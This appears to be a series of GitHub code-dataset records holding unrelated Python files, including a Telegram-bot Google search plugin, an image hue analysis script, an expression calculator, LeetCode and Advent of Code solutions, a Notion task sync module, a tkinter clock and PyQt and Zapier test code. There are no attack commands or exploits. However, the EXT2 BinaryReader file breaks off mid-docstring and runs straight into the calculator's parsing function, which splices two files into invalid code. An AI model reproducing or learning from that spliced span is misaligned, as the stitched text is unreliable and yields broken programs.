output\n","repo_name":"jeonchangbin49/MedleyVox","sub_path":"svs/utils/parselmouth_utils.py","file_name":"parselmouth_utils.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"52"}
{"seq_id":"19835496387","text":"from search_engine_parser import GoogleSearch\n\nfrom userge import userge, Message\n\nGoogleSearch.parse_soup = lambda __, _: _.find_all(\"div\", class_=\"Gx5Zad fP1Qef xpd EtOod pkphOe\")\n\n\n@userge.on_cmd(\"google\", about={\n    'header': \"do a Google search\",\n    'flags': {\n        '-p': \"page of results to return (default to 1)\",\n        '-l': \"limit the number of returned results (defaults to 5)(max 10)\"},\n    'usage': \"{tr}google [flags] [query | reply to msg]\",\n    'examples': \"{tr}google -p4 -l10 github-userge\"})\nasync def gsearch(message: Message):\n    query = message.filtered_input_str\n    await message.edit(f\"**Googling** for `{query}` ...\")\n    flags = message.flags\n    page = int(flags.get('-p', 1))\n    limit = int(flags.get('-l', 5))\n    if message.reply_to_message:\n        query = message.reply_to_message.text\n    if not query:\n        await message.err(\"Give a query or reply to a message to google!\")\n        return\n    try:\n        g_search = GoogleSearch()\n        gresults = await g_search.async_search(query, page)\n    except Exception as e:\n        await message.err(e)\n        return\n    output = \"\"\n    for i in range(limit):\n        try:\n            title = gresults[\"titles\"][i].replace(\"\\n\", \" \")\n            link = gresults[\"links\"][i]\n            desc = gresults[\"descriptions\"][i]\n            output += f\"[{title}]({link})\\n\"\n            output += f\"`{desc}`\\n\\n\"\n        except (IndexError, KeyError):\n            break\n    output = f\"**Google Search:**\\n`{query}`\\n\\n**Results:**\\n{output}\"\n    await message.edit_or_send_as_file(text=output, caption=query,\n                                       disable_web_page_preview=True)\n","repo_name":"UsergeTeam/Userge-Plugins","sub_path":"plugins/utils/google/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"52"}
{"seq_id":"37894208825","text":"import argparse\nimport os, sys\nscript_dir = os.path.dirname(os.path.realpath(__file__))\nsys.path.insert(0, os.path.join(script_dir, \"../../\"))\nimport model.build_model\nimport python_server.mapping_features\nimport pandas as pd\nimport matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport glob\nfrom os import listdir\nfrom os.path import basename, join, isdir, isfile\nimport math\nimport numpy as np\nimport yaml\nfrom capnp_serial import mapping_capnp\n\ndef calculate_hue_fraction(observation, color):\n    feature = observation.feats.feats[0]\n    if feature.type == 
mapping_capnp.Feature.Type.fullColorHistogram:\n        whole_histo = feature.feat.wholeHisto.histo\n        hues = whole_histo.counts[0].count\n        total_pixels = whole_histo.totalCountedPixels\n\n        hue_count = 0\n        for (low, high) in color:\n            for idx in range(low, high):\n                hue_count += hues[idx]\n        hf = hue_count/float(total_pixels)\n        return hf\n    elif feature.type == mapping_capnp.Feature.Type.hsvHistogram:\n        hists = feature.feat.hsvHisto.colorHistograms \n        fg_pixels = feature.feat.hsvHisto.totalCountedPixels\n        if len(hists) > 1:\n            print(\"Multi-color histograms are not supported yet. Exiting.\")\n            exit(1)\n        hist = hists[0]\n        \n        total_color_pixels = 0\n        for row_idx in range(len(hist.valueBins)):\n            row = hist.valueBins[row_idx]\n            for col_idx in range(len(row.counts)):\n                col = row.counts[col_idx]\n                total_color_pixels += col\n        hue_fraction = total_color_pixels/fg_pixels\n        return hue_fraction\n\ndef main(training_conf_dir):\n    with open(join(training_conf_dir, \"conf.yaml\")) as f:\n        conf = yaml.safe_load(f)\n    colors = {}\n    for hue_bin in conf[\"hue_bins\"]:\n        name = hue_bin[\"name\"]\n        colors[name] = []\n        for r in hue_bin[\"ranges\"]:\n            colors[name].append((r[\"start\"], r[\"end\"]))\n\n    training_dir = conf[\"training_dir\"]\n    vids = [d for d in listdir(training_dir) if isdir(join(training_dir, d))]\n    for vid in vids:\n        vid_dir = join(training_dir, vid)\n        bin_file = [join(vid_dir, f) for f in listdir(vid_dir) if isfile(join(vid_dir, f)) and f.endswith(\".bin\")][0]\n        # Extracting the features from training data samples\n        observations = python_server.mapping_features.read_samples(bin_file)\n        frame_id=0\n\n        color_hfs = {}\n        for color in colors:\n            color_hfs[color] = []\n\n        for observation in observations:\n            if frame_id < 1:\n                frame_id += 1\n                continue\n\n            label = observation.label\n            if not label:\n                frame_id += 1\n                continue\n            \n            feature = observation.feats.feats[0]\n            for color in colors:\n                hf = calculate_hue_fraction(observation, colors[color])\n                color_hfs[color].append(hf)\n            frame_id += 1\n        print(vid, end=\"\\t\")\n        for color in colors:\n            print(min(color_hfs[color]), end=\"\\t\")\n        print(\"\")\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description=\"Analyzing what should be the cutoff Hue Fraction.\")\n    parser.add_argument(\"-C\", dest=\"training_conf_dir\", help=\"Path to training conf folder\")\n\n    args = parser.parse_args()\n    main(args.training_conf_dir)\n\n","repo_name":"esaurez/LoadShedderInterface","sub_path":"src/color_analysis/hue_analysis/hue_fraction_analysis.py","file_name":"hue_fraction_analysis.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"20475380054","text":"\"\"\"binaryreader.py: EXT2 Binary reader for file value extraction.\"\"\"\n\n__author__ = \"Frederik Bußmann\"\n__license__ = \"MIT\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Frederik Bußmann\"\n__email__ = \"frederik@bussmann.io\"\n\n\nimport struct\n\n\nclass BinaryReader(object):\n    \"\"\"\n    A binary reader for converting multiple values from a bytearray with error checks.\n\n    Attributes\n    ----------\n    binary_data : bytes\n        The byte array to extract values from.\n    error : bool\n        The error state of the reader.\n    \"\"\"\n\n    def __init__(self, data):\n        \"\"\"\n        Class constructor.\n\n        Parameters\n        ----------\n        data : bytes\n            The byte array to extract values from.\n        \"\"\"\n\n        self.binary_data = data\n        self.error = False\n\n    def get_data_from_binary(self, start_position, end_position, byte_format):\n        \"\"\"\n        Gets a value 
from the given binary data file, handling read errors.\n\n        Parameters\n        ----------\n        start_position : int\n            The first index bit of the value.\n        end_position : int\n            The last index bit of the value.\n        byte_format : str\n            The format of the value ( max_priority:\n            return parse_unary()\n\n        left = parse_bin(priority + 1)\n        ops = ops_by_priority(priority)\n\n        while has() and current().type == TokenType.OPERATION:\n            pos = current().pos\n            for op in ops:\n                if accept(TokenType.OPERATION, op.symbol):\n                    right = parse_bin(priority + 1 - op.rtl)\n                    left = BinOpNode(pos, op, left, right)\n                    break\n            else:\n                break\n\n        return left\n\n    def parse_unary():\n        for op in unary_operators:\n            pos = index\n            if accept(TokenType.OPERATION, op.symbol):\n                return UnaryOpNode(pos, op, parse_unary())\n\n        return parse_call()\n\n    def parse_call():\n        head = parse_term()\n\n        if isinstance(head, IdentifierNode) and accept(TokenType.PARENTHESIS, \"(\"):\n            arg = parse_expr()\n            expect(TokenType.PARENTHESIS, \")\")\n            return CallNode(head.pos, head.val, arg)\n\n        return head\n\n    def parse_term():\n        token = current()\n\n        if token.type == TokenType.NUMBER:\n            return NumberNode(token.pos, expect(TokenType.NUMBER).val)\n        elif token.type == TokenType.IDENTIFIER:\n            return IdentifierNode(token.pos, expect(TokenType.IDENTIFIER).val)\n        elif accept(TokenType.PARENTHESIS, \"(\"):\n            val = parse_expr()\n            expect(TokenType.PARENTHESIS, \")\")\n            return val\n        else:\n            raise ParseError(\n                f\"expected term, got {stringify_rule(token.type, token.val)}\", token.pos)\n\n    def parse_expr():\n        nonlocal index\n        left = parse_bin()\n        if index < len(tokens):\n            old = index\n            try:\n                right = parse_expr()\n                return BinOpNode(right.pos, operators[2], left, right)\n            except Exception:\n                index = old\n        return left\n\n    return parse_expr()\n\n\n@dataclass\nclass EvalContext:\n    variables: dict\n    functions: dict\n\n    def get_var(self, name):\n        return self.variables[name]\n\n    def get_func(self, name):\n        return self.functions[name]\n\n\ndef get_default_context():\n    import cmath\n    import math\n    from numbers import Number\n    from itertools import chain\n\n    ctx = EvalContext(\n        {**{k: v for (k, v) in cmath.__dict__.items() if not k.startswith(\"_\")\n            and isinstance(v, Number)}, **{\"i\": 1j, \"j\": 1j}},\n        {k: v for (k, v) in chain(math.__dict__.items(\n        ), cmath.__dict__.items()) if not k.startswith(\"_\") and callable(v)}\n    )\n\n    return ctx\n\n\ndefc = get_default_context()\n\n\ndef evalstr(inp: str, parentctx: EvalContext = None):\n    if parentctx is None:\n        parentctx = defc\n    ctx = EvalContext(parentctx.variables.copy(), parentctx.functions.copy())\n    while True:\n        try:\n            tok = tokenize(inp)\n            tree = parse(tok)\n            print(tree)\n            print(tree.write())\n            return tree.eval(ctx)\n        except UndeclaredVarError as e:\n            value = input(f\"value for '{e.var}'? 
\")\n if not value:\n return None\n value = evalstr(value, ctx)\n if not value:\n return None\n ctx.variables[e.var] = value\n continue\n\n\nwhile True:\n inp = input(\"> \")\n if inp == \"?\":\n print(\"functions:\")\n print(\" \" + \", \".join(ctx.functions.keys()))\n print(\"variables:\")\n print(\" \" + \", \".join(ctx.variables.keys()))\n else:\n try:\n res = evalstr(inp)\n if res is None:\n print(\"-- cancelled\")\n else:\n if res.imag == 0:\n res = res.real\n print(res)\n except ParseError as e:\n print((2 + e.pos) * \" \" + \"↑\")\n print(str(e) + \" at \" + str(e.pos))\n except Exception as e:\n print(str(e))\n print()\n","repo_name":"zdimension/simplecalc","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":10308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12669516616","text":"\nimport sys\n\nlines = sys.stdin.readlines()\nnums = map(int, lines)\n\nx, y = 0, 0\nfor line in lines:\n dir, amt = line.split()\n amt = int(amt)\n if dir == \"forward\":\n x += amt\n elif dir == \"down\":\n y += amt\n elif dir == \"up\":\n y -= amt\n\nprint(x * y)\n\nx, y, aim = 0, 0, 0\nfor line in lines:\n dir, amt = line.split()\n amt = int(amt)\n if dir == \"forward\":\n x += amt\n y += aim * amt\n elif dir == \"down\":\n aim += amt\n elif dir == \"up\":\n aim -= amt\nprint(x * y)\n","repo_name":"nathanlo99/adventofcode","sub_path":"2021/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3651977481","text":"import tkinter, datetime, random\r\nfrom tkinter import*\r\n\r\nchoice_color = ('red', 'blue', 'green', 'yellow', 'orange', 'purple', 'aqua',\r\n 'teal', 'powder blue', 'steel blue', 'brown', 'black', 'white', 'pink', 'grey')\r\nchoice_color2 = ('teal', 'powder blue', 'aqua', 'grey')\r\nfav_color = input('Will you prefer auto generation or manual(a/m) \\n')\r\n\r\nroot = Tk()\r\nroot.title('Clock & Alarms')\r\nroot.geometry('500x500+25+50')\r\nroot.minsize(width = 220, height = 65)\r\n#root.maxsize(width = 500, height = 500)\r\ntime1 = StringVar()\r\n#root.configure(background = Random_Color(choice_color))\r\ndef Manual_Color():\r\n try:\r\n manual_color = input('What color would you prefer for your backgorund\\n')\r\n return manual_color\r\n except Exception as msg:\r\n print('UnknownColorNameError: [%s]' %(msg))\r\n\r\n\r\ndef Auto_Color(color_tuple):\r\n rand_color = random.choice(color_tuple)\r\n return rand_color\r\n\r\ndef Current_Time():\r\n try:\r\n from datetime import datetime as time_obj\r\n import datetime as date_obj\r\n import time\r\n \r\n seconds_delta = date_obj.timedelta(seconds = 1)\r\n today = time_obj.now()\r\n current_period = time_obj(today.year, today.month, today.day, \r\n today.hour, today.minute, today.second)\r\n while(True):\r\n hours = current_period.hour\r\n minutes = current_period.minute\r\n seconds = current_period.second\r\n\r\n i = 1\r\n i += seconds\r\n time.sleep(1)\r\n root.update()\r\n return ('{0} : {1} : {2}'.format(hours, minutes, i))\r\n \r\n except Exception as msg:\r\n print('[%s]' %(msg))\r\n\r\ndef Refresh_Time():\r\n root.update()\r\n '''import datetime as date_obj\r\n from datetime import datetime as time_obj\r\n import time, itertools\r\n \r\n seconds_delta = date_obj.timedelta(seconds = 1)\r\n today = time_obj.now()\r\n current_period = time_obj(today.year, today.month, today.day, \r\n today.hour, today.minute, 
today.second)\r\n\r\n    hours = current_period.hour\r\n    minutes = current_period.minute\r\n    seconds = 0#current_period.second\r\n    time1.set('{0} : {1} : {2}'.format(hours, minutes, 13))\r\n    if root.update():\r\n        while (c for c in itertools.cycle(range(0,60, 1))):\r\n            time.sleep(1)\r\n            time.set('{0} : {1} : {2}'.format(hours, minutes, c))'''\r\n\r\n    #hour += hour*60*60\r\n\r\nif fav_color == 'm':\r\n    root.configure(background = Manual_Color())\r\nelse:\r\n    root.configure(background = Auto_Color(choice_color))\r\n\r\n\r\nmid_frame = Frame(root, relief = 'flat', height = 400, width = 400,\r\n          bg =Auto_Color(choice_color2), bd = 0).grid(sticky = N, padx = 1, pady = 1)\r\n\r\ntime_box = Label(root, font = ('serif', 30, 'bold'), text = Current_Time(),\r\n    bd = 2, padx = 2, pady = 2, fg ='black', bg = 'white').grid(row=5, column=5) \r\n'''\r\nrefresh_box = Label(mid_frame, font = ('serif', 30, 'bold'), textvariable = time1,\r\n    bd = 2, padx = 2, pady = 2, fg ='black', bg = 'white').grid(row=5, column=5) \r\n'''\r\nbtnRefresh= Button(root, text='Refresh', padx=2, pady=2, bd=2, fg='black',\r\n     font=('arial',10,'bold'), width=12, height=1, command=Refresh_Time).grid(row=3,column=0)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    mainloop()\r\n\r\n","repo_name":"Sambou-kinteh/Pythonmodules","sub_path":"clock_face.py","file_name":"clock_face.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"33861804592","text":"\"\"\"\n560. Subarray Sum Equals K\nhttps://leetcode.com/problems/subarray-sum-equals-k/\n\nGiven an array of integers and an integer k, you need to find the total number of continuous subarrays whose sum equals to k.\n\nExample 1:\n\nInput:nums = [1,1,1], k = 2\nOutput: 2\nNote:\n\nThe length of the array is in range [1, 20,000].\nThe range of numbers in the array is [-1000, 1000] and the range of the integer k is [-1e7, 1e7].\n\n\"\"\"\n\nclass Solution:\n    def subarraySum(self, nums: List[int], k: int) -> int:\n        d = {}\n        d[0] = 1\n        s = 0\n        count = 0\n        for i in range(len(nums)):\n            s += nums[i]\n            if s-k in d: # --- I\n                count += d[s-k]\n                # or return True\n                # or return indices\n\n            # add sum to freq dict\n            if s in d:\n                d[s] += 1 # --- II\n            else:\n                d[s] = 1\n\n        return count\n\n\n    \t # COMMENT -- I\n    \t # ---------------\n    \t # Single scan. 
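For example, with nums=[1,2,3] and k=3 the running\n    \t # sums are 1, 3, 6; (sum-k) is found in d at sums 3 and 6, counting\n    \t # the subarrays [1,2] and [3]. 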
Given the current sum and the k, we check if (sum-k) existed as previous sum at an earlier stage (i.e., a smaller window)\n    \t # Keep expanding the sum while checking whether we have seen (sum - k) before\n    \t\n    \n    \n        # COMMENT -- II\n        # ---------------\n        # A prefix sum's frequency can exceed 1 when nums contains zeros\n        # (ex: nums = [1,2,3,0,4], where the sum repeats on consecutive\n        # iterations) or negative numbers, which can bring the sum back to\n        # an earlier value.\n        # It's important to capture this in order to return the correct\n        # number of subarrays that add up to target.\n        # Only if all numbers were strictly positive (making prefix sums\n        # strictly increasing, hence distinct) could the prefix dict be\n        # replaced with a plain set.\n        ","repo_name":"EvanTian233/Leetcode-solutions","sub_path":"Python_Solutions/DataStructure/3_HashTable/SubarraySum.py","file_name":"SubarraySum.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"70029721444","text":"import sys\nimport asyncio\nimport logging\nfrom os import path\nfrom datetime import datetime, date\nimport pytz\nimport yaml\nimport json\nfrom notion_client import AsyncClient\n\n# read config\nCONFIG_PATH = './config.yaml'\nCACHE_PATH = './data/cache.json'\ntry:\n    if path.exists(CONFIG_PATH):\n        with open(CONFIG_PATH, \"r\") as f:\n            CONFIG = yaml.safe_load(f)\n        try:\n            NOTION_KEY = CONFIG.get('notion').get('key')\n            DB_ID = CONFIG.get('notion').get('database_id')\n            FILTER = CONFIG.get('notion').get('filter')\n        except Exception:\n            raise ValueError('Invalid config file, check the docs!')\n    else:\n        raise ValueError('config.yaml not found, check the docs!')\nexcept ValueError as e:\n    print(e)\n    sys.exit()\n\n\nclass Task(object):\n    def __init__(\n        self,\n        name,\n        source,\n        start=None,\n        due=None,\n        priority=None,\n        timestamp=None,\n        notion_id=None,\n        caldav_uid=None,\n        cached=False\n    ) -> None:\n        self.name = name\n        self.source = source\n        self.start = start\n        self.due = due\n        self.priority = priority\n        if timestamp:\n            self.timestamp = timestamp\n        else:\n            self.timestamp = datetime.now(pytz.utc).isoformat()\n        self.notion_id = notion_id\n        self.caldav_uid = caldav_uid\n        self.cached = cached\n    \n    @staticmethod\n    def from_notion(page):\n        task = Task('New Task', 'notion')\n        task.update_with_notion(page)\n        return task\n    \n    def update_with_notion(self, page):\n        self.name = page.get('properties').get('Name').get('title')[0].get('text').get('content')\n        self.source = 'notion'\n        date_obj = page.get('properties').get(CONFIG.get('notion').get('date_property')).get('date')\n        self.start, self.due = date_mapping(date_obj)\n        self.timestamp = normalize_notion_timestamp(page.get('last_edited_time'))\n        self.notion_id = page.get('id')\n\n\n    async def to_notion(self, client):\n        if self.notion_id:\n            page = await client.pages.update(\n                **{\n                    'page_id': self.notion_id,\n                    'properties': self.notion_properties()\n                }\n            )\n            logging.debug(f'Updated page {self.notion_id}, {self.name}')\n        else:\n            page = await client.pages.create(\n                **{\n                    'parent': {\n                        \"type\": \"database_id\",\n                        \"database_id\": DB_ID\n                    },\n                    'properties': self.notion_properties()\n                }\n            )\n            self.notion_id = page.get('id')\n            logging.debug(f'Created page {self.notion_id}, {self.name}')\n\n        self.timestamp = \\\n            normalize_notion_timestamp(page.get('last_edited_time'))\n        logging.debug(f'Updated timestamp {self.timestamp}')\n        return page\n\n\n    def notion_properties(self):\n        return { \n            'Name': {\n                'title': [\n                    {\n                        'text': {\n                            'content': self.name\n                        }\n                    }\n                ]\n            },\n        
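# The date property name is configurable; date_mapping() below converts\n        # the (start, due) pair into Notion's {'start': ..., 'end': ...} shape.\n        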
CONFIG.get('notion').get('date_property'): {\n                'date': date_mapping((self.start, self.due))\n            }\n        }\n    \n    def __repr__(self) -> str:\n        return f'Task({self.name})'\n\n\ndef get_notion_client(log_level=logging.WARNING):\n    # return Client(\n    return AsyncClient(\n        auth=CONFIG.get('notion').get('key'),\n        log_level=log_level\n    )\n\n\nasync def query_notion_db(client):\n    logging.debug(f'Config filter: {FILTER}')\n    if isinstance(FILTER, dict) or FILTER is None:\n        query_filter = FILTER\n    else:\n        query_filter = {\n            'property': FILTER,\n            'checkbox': {\n                'equals': True\n            }\n        }\n    logging.debug(f'Query filter: {query_filter}')\n    result = await client.databases.query(\n        **{\n            'database_id': DB_ID,\n            'filter': query_filter\n        }\n    )\n    return result.get('results')\n\n\ndef date_mapping(value):\n    if isinstance(value, tuple):\n        if value == (None, None):\n            return None\n\n        if value[0] is None:\n            start = value[1]\n            end = None\n        else:\n            start = value[0]\n            end = value[1]\n\n        return {\n            'start': start,\n            'end': end\n        }\n    elif isinstance(value, dict):\n        n_start = value.get('start')\n        n_end = value.get('end')\n        if not n_end:\n            start = None\n            due = n_start\n        else:\n            start = n_start\n            due = n_end\n        return (start, due)\n    elif value is None:\n        return (None, None)\n    else:\n        raise ValueError('Unexpected value type')\n\n\ndef utc_from_notion_stamp(time):\n    return pytz.utc.localize(datetime.strptime(\n        time,\n        '%Y-%m-%dT%H:%M:%S.%fZ')\n    )\n\n\ndef normalize_notion_timestamp(time_str):\n    return utc_from_notion_stamp(time_str).isoformat()\n\n\ndef load_cache(cache_path=CACHE_PATH):\n    if path.exists(cache_path):\n        with open(cache_path, 'r', encoding='utf-8') as f:\n            data = json.load(f)\n        logging.info(f'Loaded {len(data)} items from cache...')\n        tasks = [Task(**obj) for obj in data]\n    else:\n        tasks = []\n        logging.info('Created new cache file...')\n    return tasks\n\n\ndef dump_cache(tasks, cache_path=CACHE_PATH):\n    for t in tasks:\n        t.cached = True\n    data = [t.__dict__ for t in tasks]\n    with open(cache_path, 'w', encoding='utf-8') as create_file:\n        json.dump(data, create_file, ensure_ascii=False, indent=4)\n    logging.info(f'Saved {len(data)} items to cache...')\n    \n\nasync def main():\n    # setup logger\n    root_logger = logging.getLogger()\n    log_level = logging.getLevelName(CONFIG.get('logger'))\n    root_logger.setLevel(log_level)\n    handler = logging.FileHandler('./logs/last_run.log', 'w', 'utf-8')\n    handler.setFormatter(logging.Formatter(\n        '%(asctime)s %(levelname)s %(message)s'))\n    console = logging.StreamHandler()\n    console.setLevel(log_level)\n    root_logger.addHandler(handler)\n    root_logger.addHandler(console)\n\n    # setup connections\n    notion = get_notion_client(log_level=log_level)\n\n\nif __name__ == '__main__':\n\n    try:\n        asyncio.run(main())\n    except Exception:\n        logging.exception('Unhandled Exception', exc_info=1)\n","repo_name":"thumDer/notion-caldav","sub_path":"notion_caldav.py","file_name":"notion_caldav.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"}
{"seq_id":"8743429247","text":"# -*- coding: utf-8 -*-\nfrom PyQt4 import QtCore, QtGui\n\n\ndef on_clicked():\n    window.move(-window.width() * 2, 0)\n    QtCore.QTimer.singleShot(1000, on_timeout)\n\n\ndef on_timeout():\n    desktop = QtGui.QApplication.desktop()\n    rect1 = window.geometry()\n    rect2 = window.frameGeometry()\n    sw = 0 - window.x() - ((rect2.width() - rect1.width()) // 2)\n    sh = 0 - window.y() - rect1.top() - window.y()\n    QtGui.QPixmap.grabWindow(window.winId(),\n                             sw, sh,\n                             desktop.width(), desktop.height()\n                             
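# QPixmap.grabWindow(winId, x, y, w, h) grabs a w-by-h region in the\n                             # window's coordinate space; the offsets computed above appear intended\n                             # to cover the whole desktop while the window is parked off-screen.\n                             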
).save(\"screen.png\", \"PNG\")\n window.move(0, 0)\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtGui.QApplication(sys.argv)\n window = QtGui.QWidget()\n window.setWindowTitle(\"Класс QPixmap\")\n window.move(0, 0)\n box = QtGui.QVBoxLayout()\n button = QtGui.QPushButton(\"Сделать скриншот экрана\")\n button.clicked.connect(on_clicked)\n box.addWidget(button)\n window.setLayout(box)\n window.show()\n sys.exit(app.exec_())","repo_name":"syurskyi/Python_Topics","sub_path":"140_gui/pyqt_pyside/examples/PyQt_PySide_book/006_Working with graphics/003_Working with Images/582. QPixmap_grabWindow_desktop.py","file_name":"582. QPixmap_grabWindow_desktop.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"31034972448","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom hamcrest import assert_that\nfrom hamcrest import contains\nfrom hamcrest import has_length\nfrom hamcrest import is_\n\nfrom zope.component.hooks import getSite\n\nfrom zope.securitypolicy.interfaces import IPrincipalPermissionMap\nfrom zope.securitypolicy.interfaces import IPrincipalRoleManager\n\nfrom zope.securitypolicy.settings import Allow\nfrom zope.securitypolicy.settings import Unset\n\nfrom nti.app.products.zapier.authorization import ACT_VIEW_EVENTS\n\nfrom nti.app.testing.application_webtest import ApplicationLayerTest\n\nfrom nti.app.testing.decorators import WithSharedApplicationMockDS\n\nfrom nti.dataserver.authorization import ROLE_SITE_ADMIN_NAME\n\nfrom nti.dataserver.tests import mock_dataserver as mock_ds\n\nfrom nti.dataserver.users.common import set_user_creation_site\n\n\nclass TestUserPrincipalPermissionMap(ApplicationLayerTest):\n\n @WithSharedApplicationMockDS(users=(\"site.admin\",\n \"diff.site.admin\",\n \"not.site.admin\"))\n def test_mixed_admins(self):\n with mock_ds.mock_db_trans(self.ds,\n site_name=\"alpha.nextthought.com\"):\n # A user that can administer \"not.site.admin\"\n admin = self._get_user('site.admin')\n site = getSite()\n site_name = site.__name__\n set_user_creation_site(admin, site_name)\n prm = IPrincipalRoleManager(site)\n prm.assignRoleToPrincipal(ROLE_SITE_ADMIN_NAME, admin.username)\n\n # A user that cannot administer \"not.site.admin\"\n diff_site_admin = self._get_user('diff.site.admin')\n set_user_creation_site(diff_site_admin, 'janux.ou.edu')\n prm.assignRoleToPrincipal(ROLE_SITE_ADMIN_NAME,\n diff_site_admin.username)\n\n # User to check against\n not_admin = self._get_user('not.site.admin')\n set_user_creation_site(not_admin, site_name)\n\n ppm = IPrincipalPermissionMap(not_admin)\n principals = ppm.getPrincipalsForPermission(ACT_VIEW_EVENTS.id)\n assert_that(principals, has_length(1))\n assert_that(principals, contains((admin.username, Allow)))\n\n perms = ppm.getPermissionsForPrincipal(admin.username)\n assert_that(perms, has_length(1))\n assert_that(perms, contains((ACT_VIEW_EVENTS.id, Allow)))\n\n perms = ppm.getPermissionsForPrincipal(diff_site_admin.username)\n assert_that(perms, has_length(0))\n\n setting = ppm.getSetting(ACT_VIEW_EVENTS.id, admin.username)\n assert_that(setting, is_(Allow))\n\n setting = ppm.getSetting(ACT_VIEW_EVENTS.id, diff_site_admin.username)\n assert_that(setting, is_(Unset))\n\n prin_perms = ppm.getPrincipalsAndPermissions()\n assert_that(prin_perms, has_length(1))\n assert_that(prin_perms, 
contains((admin.username, ACT_VIEW_EVENTS.id, Allow)))\n\n            # Our diff site user should be able to administer themselves\n            ppm = IPrincipalPermissionMap(diff_site_admin)\n            principals = ppm.getPrincipalsForPermission(ACT_VIEW_EVENTS.id)\n            assert_that(principals, has_length(1))\n            assert_that(principals, contains((diff_site_admin.username, Allow)))\n\n            perms = ppm.getPermissionsForPrincipal(admin.username)\n            assert_that(perms, has_length(0))\n\n            perms = ppm.getPermissionsForPrincipal(diff_site_admin.username)\n            assert_that(perms, has_length(1))\n            assert_that(perms, contains((ACT_VIEW_EVENTS.id, Allow)))\n\n            setting = ppm.getSetting(ACT_VIEW_EVENTS.id, admin.username)\n            assert_that(setting, is_(Unset))\n\n            setting = ppm.getSetting(ACT_VIEW_EVENTS.id, diff_site_admin.username)\n            assert_that(setting, is_(Allow))\n\n            prin_perms = ppm.getPrincipalsAndPermissions()\n            assert_that(prin_perms, has_length(1))\n            assert_that(prin_perms, contains((diff_site_admin.username, ACT_VIEW_EVENTS.id, Allow)))\n\n    @WithSharedApplicationMockDS(users=(\"alpha.user.1\",\n                                        \"diff-site.user\",\n                                        \"alpha.user.2\"))\n    def test_no_admins(self):\n        with mock_ds.mock_db_trans(self.ds,\n                                   site_name=\"alpha.nextthought.com\"):\n            site = getSite()\n            site_name = site.__name__\n\n            alpha_one = self._get_user('alpha.user.1')\n            set_user_creation_site(alpha_one, site_name)\n            diff_site_user = self._get_user('diff-site.user')\n            set_user_creation_site(diff_site_user, 'diff-site')\n            alpha_two = self._get_user('alpha.user.2')\n            set_user_creation_site(alpha_two, site_name)\n\n            ppm = IPrincipalPermissionMap(alpha_two)\n            principals = ppm.getPrincipalsForPermission(ACT_VIEW_EVENTS.id)\n            assert_that(principals, has_length(0))\n\n            perms = ppm.getPermissionsForPrincipal(alpha_one.username)\n            assert_that(perms, has_length(0))\n\n            setting = ppm.getSetting(ACT_VIEW_EVENTS.id, alpha_one.username)\n            assert_that(setting, is_(Unset))\n\n            prin_perms = ppm.getPrincipalsAndPermissions()\n            assert_that(prin_perms, has_length(0))\n","repo_name":"OpenNTI/nti.app.products.zapier","sub_path":"src/nti/app/products/zapier/tests/test_zope_security.py","file_name":"test_zope_security.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"9627686230","text":"# https://leetcode.com/problems/plus-one/\n\"\"\" \nSuccess\nRuntime: 33 ms, faster than 26.14% of Python online submissions for Plus One.\nMemory Usage: 13.3 MB, less than 71.06% of Python online submissions for Plus One.\n \"\"\"\n\nclass Solution(object):\n    def plusOne(self, digits):\n        \"\"\"\n        :type digits: List[int]\n        :rtype: List[int]\n        \"\"\"\n        # # Simple alternative: use str/int methods to convert back and forth\n        # str1 = \"\".join(str(e) for e in digits)\n        # list1 = list(str(int(str1) + 1))\n        # return [int(e) for e in list1]\n        \n        '''\n        Given: [8,9,9,9]\n        \n        Output: [9,0,0,0]\n                 ^\n        index: 3\n        '''\n        \n        index = len(digits) - 1\n        while digits[index] == 9:\n            digits[index] = 0\n            if index == 0:\n                digits.insert(0, 1)\n                return digits\n            if digits[index - 1] != 9:\n                digits[index - 1] += 1\n                return digits\n            index -= 1\n        digits[index] += 1\n        return digits\n        \n\n        # grab the last element of the list\n        # while it is 9, turn it into a 0\n        # and increment the preceding number\n        # repeat if that preceding number was also a 9.\n        # if preceding number is not a 9, just increment it like normal, then return because no more operations are needed\n        # if preceding number is out of range (beginning of array), must insert a 1 to the 
